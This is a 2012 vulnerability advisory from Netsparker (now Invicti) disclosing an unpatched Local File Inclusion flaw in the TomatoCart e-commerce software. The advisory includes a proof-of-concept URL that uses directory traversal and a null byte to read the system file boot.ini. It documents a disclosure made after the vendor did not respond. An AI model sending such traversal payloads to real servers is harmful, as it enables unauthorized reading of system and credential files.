InLocal File Inclusion in TomatoCart Discovered with Invicti
Information
Advisory by Netsparker (now Invicti)
Name: Local File Inclusion Vulnerability in TomatoCart
Software: TomatoCart 1.2.0 Alpha 2 and possibly below.
Vendor Homepage: https://sourceforge.net/projects/tomatocart/
Vulnerability Type: Local File Inclusion
Severity: Critical
Researcher: Canberk Bolat
Advisory Reference: NS-12-004
Description
TomatoCart is a professional and innovative open-source eCommerce solution. The back-end is an impressive desktop-like ExtJS-powered interface, offering significant usability improvements and user experience. It’s the most easy-to-use shopping cart.
Details
TomatoCart is affected by a Local File Inclusion vulnerability in version 1.2.0 Alpha 2.
Example PoC url is as follows:
http://example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00
You can read the full article about Local File Inclusion vulnerability from here:
Solution
No patch was released.
Advisory Timeline
30/09/2011 – First contact: No response
26/12/2011 – Second contact: No response
28/03/2012 – Vulnerability Released
Credits
It has been discovered on testing of Invicti.
References
- Invicti Advisories : /web-applications-advisories/
About Invicti
IInvicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.